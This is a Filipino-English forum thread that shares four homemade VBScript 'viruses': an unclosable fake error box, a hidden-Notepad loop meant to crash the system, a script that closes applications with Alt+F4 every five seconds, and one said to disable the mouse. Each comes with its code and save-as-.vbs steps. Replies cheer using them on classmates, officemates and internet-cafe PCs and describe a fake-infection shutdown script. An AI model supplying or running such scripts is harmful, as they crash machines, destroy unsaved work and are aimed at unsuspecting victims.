What's new

Closed 4 virus for pc, that you can make by yourself

Status
Not open for further replies.

iPixx

Forum Veteran
Joined
Sep 18, 2017
Posts
2,580
Reaction
1,670
Points
781
Gawa muna tayo ng mga virus.. Para ito sa mga sukarap na bata

Note : Do not use these virus, if you don’t know about these viruses and it’s harm.

#1. Display a fake message box :
Open notepad type the following and save it as “(name).vbs”
Code:
do
msgbox "System Error : 423"
loop

This script displays a message box with the message “System Error : 432” which gets invoked again and again if you try to close it.


#2. Crash System :
Open notepad type the following and save it as “(name).vbs”

Code:
set ws=CreateObject("wscript.shell")
do
ws.run "notepad",0
loop

This program will infinitely open notepad in hidden mode causing your system memory to overload crash…! The value “0” in the third line specifies the mode in which the application should run here it is hidden mode.

#3. Close applications automatically within 5 seconds :
Open notepad type the following and save it as “(name).vbs”

Code:
set ws=CreateObject("wscript.shell")
do
ws.sendkeys "%{F4}"
wscript.sleep 5000
loop

This script automatically close any opened Applications within 5 seconds you can specify a larger time value by changing the line “wscript.sleep 5000″ for example if u want to close within 10 seconds then change the value from “5000” to “10000”.

#4. Disable The Mouse :
Open notepad type the following and save it as “(name).vbs”

Code:
set ws=Createobject("wscript.shell")
for i=1 to 4
ws.run "WISPTIS.EXE",0
next

This script temporarily disables the mouse functionality.


Thanks

 
nice repa, salamat sa pagshare, ok to pambwisit sa classmate o officemate mong buraot:)
 
Last edited by a moderator:
Eto pra mejo matuwa naman ung mabibiktima nyo :)


Spoiler contents are visible only to Established Members.

paste nyo sa notepad and save as .vbs

pag na execute yan. lalabas ang message box na Infected ang system at Magshushutdown ang pc :)


BTW hindi po talaga infected ang inyong pc. pero magshushutdown po.
pang good time lang po sa mga kaibigan nyo :) hahaha
 
Eto pra mejo matuwa naman ung mabibiktima nyo :)



paste nyo sa notepad and save as .vbs

pag na execute yan. lalabas ang message box na Infected ang system at Magshushutdown ang pc :)


BTW hindi po talaga infected ang inyong pc. pero magshushutdown po.
pang good time lang po sa mga kaibigan nyo :) hahaha

Meron din yung shutdown mo ibang pc kung sa netcafe ka hahaha tpos sayo gumagana.. Bsta mapag.aralan lang ang cmd daming gamitan
 
Eto pra mejo matuwa naman ung mabibiktima nyo :)



paste nyo sa notepad and save as .vbs

pag na execute yan. lalabas ang message box na Infected ang system at Magshushutdown ang pc :)


BTW hindi po talaga infected ang inyong pc. pero magshushutdown po.
pang good time lang po sa mga kaibigan nyo :) hahaha
Pang gulo talaga yang wscript.exe eh.. Hahaha attrib lang makakatanggal dyan
 
Status
Not open for further replies.

Similar threads

Back
Top